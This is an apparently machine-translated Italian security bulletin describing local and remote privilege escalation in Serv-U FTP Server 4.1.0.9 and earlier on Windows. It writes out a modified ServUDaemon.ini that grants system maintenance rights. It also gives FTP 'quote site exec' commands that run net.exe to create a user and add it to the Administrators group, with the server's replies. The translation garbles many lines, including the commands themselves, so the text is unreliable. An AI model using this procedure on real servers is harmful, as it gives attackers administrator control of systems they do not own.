Locale privilegi elevati: Sì
Remote privilegi elevati: Sì
precondizioni Usa: profilo Serv-U su autorizzazioni modificate
Disclaimer: Questo è solo una escalation di privilegi idee e metodi.
1, il software interessato
Serv-U FTP Server 4.1.0.9 (e tutte le versioni precedenti)
In secondo luogo, il sistema interessato
Tutte le versioni di Microsoft Windows Server 2003
Tutte le versioni di Microsoft Windows XP
Tutte le versioni di Microsoft Windows 2000
Tutte le versioni di Microsoft Windows NT
In terzo luogo, la revisione
Serv-U FTP Server per RhinoSoft prodotto un software FTP sServer, ora ampiamente utilizzato in tutto il mondo. Dopo che ho trovato, Serv-U FTP Server file di configurazione memorizzate nel file di Serv-U FTP Server directory ServUDaemon.ini. Se l'utente locale limitata o ad un attaccante remoto che ha un permesso generale di accesso al file e file attentamente il contenuto del processo di struttura ServUDaemon.ini FTP può utilizzare il sistema per eseguire comandi arbitrari con privilegi di sistema.
4, difetto di analisi:
Serv-U FTP Servire fisserà le informazioni di configurazione utente vengono archiviati e successivi di file ServUDaemon.ini. Compresi i diritti degli utenti alle informazioni e di accedere alle informazioni delle directory. Utente locale limitata o ad un attaccante remoto di leggere e scrivere fino a che Serv-U FTP Servire la directory di file, è possibile modificare i file della directory ServUDaemon.ini Ftp processo di realizzazione del telecomando, il sistema locale dei privilegi di amministratore su FTP eseguire comandi arbitrari. Versione del sistema e non soggetto alle conseguenze. ("Storage Info Utente Selezionare e del Registro di sistema" senza questo difetto interessate)
5, il metodo di prova:
1, il test locale
Supponiamo che un utente locale limitato possibile esplorare il Serv-U FTP Servire la directory dei file. Trova ServUDaemon.ini file. Utilizzare il Blocco note per aprire il contenuto generale del documento originale:
[Global]
Version = 4.1.0.0 / / Serv-U FTP Server versione numero
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMAINS]
Dominio1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 file / / IP dell'host e del dominio, le condizioni di porto
[Dominio1]
User1 = zihuan | 1 | 0
[USER zihuan = | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c: / / possibile sfogliare la directory
TimeOut = 600
Access1 = C: RWAMLCDP |
Se ServUDaemon.in file modificato come segue:
[Global]
Version = 4.1.0.0
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMAINS]
Dominio1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Dominio1]
User1 = zihuan | 1 | 0
[USER zihuan = | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c:
TimeOut = 600
Manutenzione = file system / / autorizzazioni di tipo
Access1 = C: RWAMELCDP |
Quanto sopra, più che il contenuto originale di un "Maintenance System =" salva dopo la modifica. Quindi utilizzare l'accesso FTP per Serv-U FTP Server dopo l'adozione del seguente comando:
Ftp ip aperto
Collegato al IP.
220 Serv-U FTP Server v4.1.0.0 per WinSock pronto ...
Utente (ip: (none)): file id / / user struttura di ingresso
331 Nome utente va bene, si prega di inviare completo indirizzo di posta elettronica come password.
Password: file di password / / password
230 Utente effettuato l'accesso, procedere.
Ftp cd file winnt / / nella directory winnt win2k, se è WinXP o Windows Server 2003 dovrebbe essere la directory di Windows.
250 Repertorio cambiato / WINNT
Ftp cd system32 file / / nella cartella system32
250 Repertorio cambiato / WINNT/system32
Ftp quote site exec utente ziHUAN net.exe zihuan / aggiunge il file / / utilizzare i file di sistema più net.exe l'utente.
200 Comando EXEC successo (TID = 33).
Ftp quote site exec localhost net.exe amministratori zihuan / aggiunge il file / / aggiornamento a super-user
Questo aumento nel sistema locale, una password per la zihuan: ziHUAN super utente. Può anche direttamente il sito citazione exec localhost net.exe amministratori utente / aggiungi comando per l'utente corrente di aggiornare al gruppo di utenti super andare. Naturalmente, è possibile eseguire qualsiasi comando sul sistema.
Dichiarazione:
Libri solo per descrivere i problemi di sicurezza possibile, l'autore e gli hacker rivista X Files questo bollettino sulla sicurezza non è quello di fornire alcuna garanzia o promessa. Poiché la diffusione dell'uso delle informazioni fornite in questo articolo, a seguito di eventuali conseguenze dirette o indirette della perdita da parte dell'utente stesso è responsabile, l'autore non si assume alcuna responsabilità per questo. Gli autori hanno rivisto questo bollettino sulla sicurezza e l'interpretazione. Per questo articolo, riprodotta o trasmessa, per garantire l'integrità di questo articolo, compresa la nota di copyright e tutti i contenuti di altri. Consentita senza l'autore non può modificare o cambiare qualsiasi del contenuto di questo annuncio articolo.